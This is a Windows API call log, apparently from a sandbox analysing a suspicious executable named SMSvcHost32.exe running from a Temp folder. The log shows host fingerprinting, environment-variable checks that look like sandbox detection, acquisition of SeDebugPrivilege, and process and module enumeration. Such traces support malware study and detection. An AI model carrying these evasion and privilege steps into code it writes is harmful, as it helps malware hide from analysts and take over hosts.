	[0102.036] SetLastError (dwErrCode=0x0) 
	[0102.036] GetLastError () returned 0x0
	[0102.036] SetLastError (dwErrCode=0x0) 
	[0102.036] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\1", ulOptions=0x0, samDesired=0x1, phkResult=0x20af580 | out: phkResult=0x20af580*=0x7e8) returned 0x0
	[0102.036] RegQueryValueExW (in: hKey=0x7e8, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20af5a0, lpcbData=0x20af598*=0x4 | out: lpType=0x0, lpData=0x20af5a0*=0xac, lpcbData=0x20af598*=0x4) returned 0x0
	[0102.036] RegQueryValueExW (in: hKey=0x7e8, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20af6c8, lpcbData=0x20af588*=0x200 | out: lpType=0x0, lpData=0x20af6c8*=0x49, lpcbData=0x20af588*=0x52) returned 0x0
	[0102.036] RegCloseKey (hKey=0x7e8) returned 0x0
	[0102.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0102.036] SetLastError (dwErrCode=0x0) 
	[0102.037] GetLastError () returned 0x0
	[0102.037] SetLastError (dwErrCode=0x0) 
	[0102.037] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\2", ulOptions=0x0, samDesired=0x1, phkResult=0x20af580 | out: phkResult=0x20af580*=0x7e8) returned 0x0
	[0102.037] RegQueryValueExW (in: hKey=0x7e8, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20af5a0, lpcbData=0x20af598*=0x4 | out: lpType=0x0, lpData=0x20af5a0*=0xac, lpcbData=0x20af598*=0x4) returned 0x0
	[0102.037] RegQueryValueExW (in: hKey=0x7e8, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20af6c8, lpcbData=0x20af588*=0x200 | out: lpType=0x0, lpData=0x20af6c8*=0x49, lpcbData=0x20af588*=0x52) returned 0x0
	[0102.037] RegCloseKey (hKey=0x7e8) returned 0x0
	[0102.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0102.037] SetLastError (dwErrCode=0x0) 
	[0102.037] GetLastError () returned 0x0
	[0102.037] SetLastError (dwErrCode=0x0) 
	[0102.037] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\3", ulOptions=0x0, samDesired=0x1, phkResult=0x20af580 | out: phkResult=0x20af580*=0x7e8) returned 0x0
	[0102.037] RegQueryValueExW (in: hKey=0x7e8, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20af5a0, lpcbData=0x20af598*=0x4 | out: lpType=0x0, lpData=0x20af5a0*=0xac, lpcbData=0x20af598*=0x4) returned 0x0
	[0102.037] RegQueryValueExW (in: hKey=0x7e8, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20af6c8, lpcbData=0x20af588*=0x200 | out: lpType=0x0, lpData=0x20af6c8*=0x49, lpcbData=0x20af588*=0x52) returned 0x0
	[0102.037] RegCloseKey (hKey=0x7e8) returned 0x0
	[0102.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0102.037] SetLastError (dwErrCode=0x0) 
	[0102.038] GetLastError () returned 0x0
	[0102.038] SetLastError (dwErrCode=0x0) 
	[0102.038] GetLastError () returned 0x0
	[0102.038] SetLastError (dwErrCode=0x0) 
	[0102.038] GetLastError () returned 0x0
	[0102.038] SetLastError (dwErrCode=0x0) 
	[0102.038] GetLastError () returned 0x0
	[0102.038] SetLastError (dwErrCode=0x0) 
	[0102.038] GetLastError () returned 0x0
	[0102.038] SetLastError (dwErrCode=0x0) 
	[0102.038] GetLastError () returned 0x0
	[0102.038] SetLastError (dwErrCode=0x0) 
	[0102.039] GetLastError () returned 0x0
	[0102.039] SetLastError (dwErrCode=0x0) 
	[0102.039] GetLastError () returned 0x0
	[0102.039] SetLastError (dwErrCode=0x0) 
	[0102.039] GetLastError () returned 0x0
	[0102.039] SetLastError (dwErrCode=0x0) 
	[0102.039] GetLastError () returned 0x0
	[0102.039] SetLastError (dwErrCode=0x0) 
	[0102.039] GetLastError () returned 0x0
	[0102.039] SetLastError (dwErrCode=0x0) 
	[0102.039] GetEnvironmentVariableA (in: lpName="HOMEDRIVE", lpBuffer=0x20af830, nSize=0x104 | out: lpBuffer="C:") returned 0x2
	[0102.040] GetLastError () returned 0x0
	[0102.040] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x20af948, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x20af948*=0xa283c81, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0102.044] GetEnvironmentVariableW (in: lpName="USERNAME_REQUIRED", lpBuffer=0x209f864, nSize=0x7fff | out: lpBuffer="\xf904\x20a\x9780\x26f\x57a7\x411\xf88c\x209\x4bd0\x25b\x3f61\x411\x2b04\x52\x2b0c\x52") returned 0x0
	[0102.044] GetLastError () returned 0xcb
	[0102.044] gethostname (in: name=0x20af83c, namelen=257 | out: name="x2vS1cum") returned 0
	[0102.044] GetEnvironmentVariableW (in: lpName="fakehostname", lpBuffer=0x209f864, nSize=0x7fff | out: lpBuffer="\xf904\x20a\x9780\x26f\x57a7\x411\xf88c\x209\x4bd0\x25b\x3f61\x411\x2b04\x52\x2b0c\x52") returned 0x0
	[0102.044] GetLastError () returned 0xcb
	[0102.046] CertOpenStore (lpszStoreProvider=0x9, dwEncodingType=0x0, hCryptProv=0x0, dwFlags=0x18000, pvPara=0x43b9ee0) returned 0x2608508
	[0102.048] CertEnumCertificatesInStore (hCertStore=0x2608508, pPrevCertContext=0x0) returned 0x0
	[0102.048] CertCloseStore (hCertStore=0x2608508, dwFlags=0x1) returned 1
	[0102.051] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7e8
	[0102.051] GetLastError () returned 0x0
	[0102.051] SetLastError (dwErrCode=0x0) 
	[0102.051] GetLastError () returned 0x0
	[0102.052] SetLastError (dwErrCode=0x0) 
	[0102.052] GetLastError () returned 0x0
	[0102.052] SetLastError (dwErrCode=0x0) 
	[0102.052] GetLastError () returned 0x0
	[0102.052] SetLastError (dwErrCode=0x0) 
	[0102.052] GetLastError () returned 0x0
	[0102.052] SetLastError (dwErrCode=0x0) 
	[0102.052] GetLastError () returned 0x0
	[0102.052] SetLastError (dwErrCode=0x0) 
	[0102.052] RtlInitializeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0102.052] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x7e4
	[0102.052] SetLastError (dwErrCode=0x0) 
	[0102.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x429d812, lpParameter=0x26b9810, dwCreationFlags=0x4, lpThreadId=0x20af78c | out: lpThreadId=0x20af78c*=0x638) returned 0x7ec
	[0102.053] ResumeThread (hThread=0x7ec) returned 0x1
	[0102.053] SetLastError (dwErrCode=0x0) 
	[0102.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x429d812, lpParameter=0x51a8830, dwCreationFlags=0x4, lpThreadId=0x20af78c | out: lpThreadId=0x20af78c*=0xf74) returned 0x7f0
	[0102.054] ResumeThread (hThread=0x7f0) returned 0x1
	[0102.054] SetLastError (dwErrCode=0x0) 
	[0102.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x429d812, lpParameter=0x529ec30, dwCreationFlags=0x4, lpThreadId=0x20af78c | out: lpThreadId=0x20af78c*=0xe04) returned 0x7f4
	[0102.054] ResumeThread (hThread=0x7f4) returned 0x1
	[0102.054] SetLastError (dwErrCode=0x0) 
	[0102.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x429d812, lpParameter=0x529eff8, dwCreationFlags=0x4, lpThreadId=0x20af78c | out: lpThreadId=0x20af78c*=0x628) returned 0x7f8
	[0102.055] ResumeThread (hThread=0x7f8) returned 0x1
	[0102.055] WaitForSingleObject (hHandle=0x7e4, dwMilliseconds=0xffffffff) returned 0x0
	[0102.090] WaitForSingleObject (hHandle=0x7e4, dwMilliseconds=0xffffffff) returned 0x0
	[0102.091] WaitForSingleObject (hHandle=0x7e4, dwMilliseconds=0xffffffff) returned 0x0
	[0102.092] WaitForSingleObject (hHandle=0x7e4, dwMilliseconds=0xffffffff) returned 0x0
	[0102.092] CloseHandle (hObject=0x7e4) returned 1
	[0102.092] SetEvent (hEvent=0x7e8) returned 1
	[0102.092] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0102.093] GetEnvironmentVariableW (in: lpName="trustedcomp", lpBuffer=0x209f85c, nSize=0x7fff | out: lpBuffer="\x3ac8\x52\x4bf8\x25b\xf904\x20a\x9780\x26f\x57a7\x411\xf88c\x209\x4bd0\x25b\x3f61\x411\x2b04\x52\x2b0c\x52") returned 0x0
	[0102.093] GetLastError () returned 0xcb
	[0102.093] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x20af6e4 | out: TokenHandle=0x20af6e4*=0x7e4) returned 1
	[0102.093] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x20af6e8 | out: lpLuid=0x20af6e8*(LowPart=0x14, HighPart=0)) returned 1
	[0102.130] AdjustTokenPrivileges (in: TokenHandle=0x7e4, DisableAllPrivileges=0, NewState=0x20af6f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0102.130] CloseHandle (hObject=0x7e4) returned 1
	[0102.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7e4
	[0102.136] Process32FirstW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0102.167] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x7fc
	[0102.174] Module32FirstW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.175] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.175] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.176] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.177] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.179] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.180] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.180] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.181] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.182] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.183] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.184] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.185] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.186] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.188] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.189] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.189] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.190] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.191] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.192] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.193] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.194] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.195] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.196] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.197] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.198] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.199] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.200] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.200] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.201] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.202] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.274] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.275] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.276] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.277] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.278] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.279] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.281] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.282] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.283] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.284] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.286] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.287] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.288] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.289] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.290] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.292] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.293] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.294] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.295] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.296] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.297] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.299] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.300] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.301] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.302] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.303] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.305] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.306] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.307] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.543] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.544] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.545] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.546] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.547] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.549] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.550] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.551] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.552] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.553] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.555] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.556] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.557] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.558] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.559] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.560] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.561] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.562] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.563] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.564] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.565] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.566] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.568] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.568] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.569] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.570] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.571] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.572] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.573] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.574] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.575] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 0
	[0102.576] Module32FirstW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 53
	[0102.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 16
	[0102.696] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.697] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0102.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0102.698] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0102.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0102.699] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\advapi32.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.700] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.701] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.702] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.703] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.704] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0102.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0102.708] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0102.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0102.709] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dsprop.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dsprop.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dsprop.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dsprop.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.710] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
